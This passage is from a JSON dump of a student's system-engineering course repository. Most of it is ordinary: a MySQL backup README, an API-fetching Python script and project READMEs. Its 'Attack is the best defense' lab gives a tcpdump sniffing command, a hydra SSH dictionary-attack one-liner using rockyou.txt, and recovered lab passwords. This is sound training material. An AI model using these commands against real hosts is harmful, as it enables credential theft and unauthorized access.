varchar(50) DEFAULT NULL,\n  `reg_date` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,\n  PRIMARY KEY (`id`)\n) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;\n/*!40101 SET character_set_client = @saved_cs_client */;\nubuntu@03-web-01:~$\nubuntu@03-web-01:~$ file 01-03-2017.tar.gz\n01-03-2017.tar.gz: gzip compressed data, from Unix, last modified: Wed Mar  1 23:38:09 2017\nubuntu@03-web-01:~$\n```\n\n+ [Backup script](./5-mysql_backup)\n\n</details>\n"
  },
  {
    "path": "0x15-api/0-gather_data_from_an_API.py",
    "content": "#!/usr/bin/python3\n'''A script that gathers employee name completed\ntasks and total number of tasks from an API\n'''\n\nimport re\nimport requests\nimport sys\n\nREST_API = \"https://jsonplaceholder.typicode.com\"\n\nif __name__ == '__main__':\n    if len(sys.argv) > 1:\n        if re.fullmatch(r'\\d+', sys.argv[1]):\n            id = int(sys.argv[1])\n            emp_req = requests.get('{}/users/{}'.format(REST_API, id)).json()\n            task_req = requests.get('{}/todos'.format(REST_API)).json()\n            emp_name = emp_req.get('name')\n            tasks = list(filter(lambda x: x.get('userId') == id, task_req))\n            completed_tasks = list(filter(lambda x: x.get('completed'), tasks))\n            print(\n                'Employee {} is done with tasks({}/{}):'.format(\n                    emp_name,\n                    len(completed_tasks),\n                    len(tasks)\n                )\n            )\n            if len(completed_tasks) > 0:\n                for task in completed_tasks:\n                    print('\\t {}'.format(task.get('title')))\n"
  },
  {
    "path": "0x15-api/README.md",
    "content": "# 0x15. API \n\n## Resource\n\n- [Friends don’t let friends program in shell script](https://www.turnkeylinux.org/blog/friends-dont-let-friends-program-shell-script)\n- [What is an API](https://www.webopedia.com/definitions/api/)\n- [What is an API? In English, please](https://www.freecodecamp.org/news/what-is-an-api-in-english-please-b880a3214a82/)\n- [What is a REST API](https://www.sitepoint.com/rest-api/)\n- [What are microservices](https://smartbear.com/solutions/microservices/)\n- [PEP8 Python style - having a clean code respecting style guide is really appreciated in the industry](https://www.python.org/dev/peps/pep-0008/)\n\n## Tasks\n\n<details>\n<summary><a href=\"./0-gather_data_from_an_API.py\">0. Gather data from an API</a></summary><br>\n<a href='https://postimg.cc/N5NpbXMC' target='_blank'><img src='https://i.postimg.cc/8zG9pBVG/image.png' border='0' alt='image'/></a>\n</details>\n"
  },
  {
    "path": "README.md",
    "content": "![img](https://assets.imaginablefutures.com/media/images/ALX_Logo.max-200x150.png)\n\n# 0x00 ALX System Engineering and DevOps 💥\n\n>Learning bash, scripting, networking and web infra right now, been wanting to get on this. It's going to be FUN !!.\n\n## About\n\n- This repository consists of all the .Subject projects done with [ALX Africa](https://www.alxafrica.com/) Full stack Software Engineering course in partnership with [Holberton School](https://www.holbertonschool.com/) by [th3\\_gr00t](https://th3-gr00t.tk/).\n\n---\n\n- [0x00](./0x00-shell_basics) : Writing basic bash scripts that perform basic stuff.\n- [0x01](./0x01-shell_permissions) : Linux permissions.\n- [0x02](./0x02-shell_redirections) : Shell, I/O Redirections and filters.\n- [0x03](./0x03-shell_variables_expansions) : Shell, init files, variables and expansions.\n- [0x04](./0x04-loops_conditions_and_parsing) : Loops, conditions and parsing.\n- [0x05](./0x05-processes_and_signals) : Processes and signals.\n- [0x06](./0x06-regular_expressions) : Regular expression.\n- [0x07](./0x07-networking_basics) : Networking basics #0.\n- [0x08](./0x08-networking_basics_2) : Networking basics #1.\n- [0x09](./0x09-web_infrastructure_design) : Web infrastructure design.\n- [0x0A](./0x0A-configuration_management) : Configuration management.\n- [0x0B](./0x0B-ssh) : SSH.\n- [0x0C](./0x0C-web_server) : Web server.\n- [0x0D](./0x0D-web_stack_debugging_0) : Web stack debugging #0.\n- [0x0E](./0x0E-web_stack_debugging_1) : Web stack debugging #1.\n- [0x0F](./0x0F-load_balancer) : Load balancer.\n- [0x10](./0x10-https_ssl) : HTTPS SSL.\n- [0x11](./0x11-what_happens_when_your_type_google_com_in_your_browser_and_press_enter) : What happens when you type holbertonschool.com in your browser and press Enter.\n- [0x12](./0x12-web_stack_debugging_2) : Web stack debugging #2.\n- [0x13](./0x13-firewall) : Firewall.\n- [0x14](./0x14-mysql) : MySQL.\n- [0x15](./0x15-api) : API.\n- [Attack is the best defense.](./attack_is_the_best_defense)\n"
  },
  {
    "path": "attack_is_the_best_defense/0-sniffing",
    "content": "mypassword9898!\n"
  },
  {
    "path": "attack_is_the_best_defense/1-dictionary_attack",
    "content": "password123\n"
  },
  {
    "path": "attack_is_the_best_defense/README.md",
    "content": "# Attack is the best defense\n\n## Resource\n\n- [Network sniffing](https://www.lifewire.com/definition-of-sniffer-817996)\n- [ARP spoofing](https://www.veracode.com/security/arp-spoofing)\n- [Connect to SendGrid’s SMTP relay using telnet](https://docs.sendgrid.com/ui/account-and-settings/troubleshooting-delays-and-latency)\n- [What is Docker and why is it popular?](https://www.zdnet.com/article/what-is-docker-and-why-is-it-so-darn-popular/)\n- [Dictionary attack](https://en.wikipedia.org/wiki/Dictionary_attack)\n\n## Tasks\n\n<details>\n<summary><a href=\"./0-sniffing\">0. ARP spoofing and sniffing unencrypted traffic</a></summary><br>\n\n<a href='https://postimg.cc/dZFTgZM5' target='_blank'><img src='https://i.postimg.cc/nrjYjq3f/image.png' border='0' alt='image'/></a>\n\n```sh\nsylvain@ubuntu$ telnet smtp.sendgrid.net 587\nTrying 167.89.121.145...\nConnected to smtp.sendgrid.net.\nEscape character is '^]'.\n220 SG ESMTP service ready at ismtpd0013p1las1.sendgrid.net\nEHLO ismtpd0013p1las1.sendgrid.net\n250-smtp.sendgrid.net\n250-8BITMIME\n250-PIPELINING\n250-SIZE 31457280\n250-STARTTLS\n250-AUTH PLAIN LOGIN\n250 AUTH=PLAIN LOGIN\nauth login           \n334 VXNlcm5hbWU6\nVGhpcyBpcyBteSBsb2dpbg==\n334 UGFzc3dvcmQ6\nWW91IHJlYWxseSB0aG91Z2h0IEkgd291bGQgbGV0IG15IHBhc3N3b3JkIGhlcmU/ISA6RA==\n235 Authentication successful\nmail from: sylvain@kalache.fr\n250 Sender address accepted\nrcpt to: julien@google.com\n250 Recipient address accepted\ndata\n354 Continue\nTo: Julien\nFrom: Sylvain\nSubject: Hello from the insecure world\n\nI am sending you this email from a Terminal.\n.\n250 Ok: queued as Aq1zhMM3QYeEprixUiFYNg\nquit\n221 See you later\nConnection closed by foreign host.\nsylvain@ubuntu$ \n```\n\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/kG0NxDH6/image.png' border='0' alt='image'/></a>\n\n```sh\n# Run this when there is no other process running,\n# ...tried to find a way to specifically filter the specif process but\n# ...the best option was to run it in a virtual enviroment\n# ...also base64 should be your best friend\nsudo tcpdump -A -l\n```\n\n- [user\\_authenticating\\_into\\_server](./user_authenticating_into_server) binary script file.\n\n</details>\n\n<details>\n<summary><a href=\"./1-dictionary_attack\">1. Dictionary attack</a></summary><br>\n\n<a href=\"https://ibb.co/Ltr6sZh\"><img src=\"https://i.ibb.co/7WQV01N/image.png\" alt=\"image\" border=\"0\"></a>\n\n- [Wordlist](https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt) **Rockyou.txt**\n\n```sh\n# command\nhydra -V -s 2222 -l sylvain -P rockyou.txt 127.0.0.1 ssh -t 64\n```\n\n</details>\n"
  }
]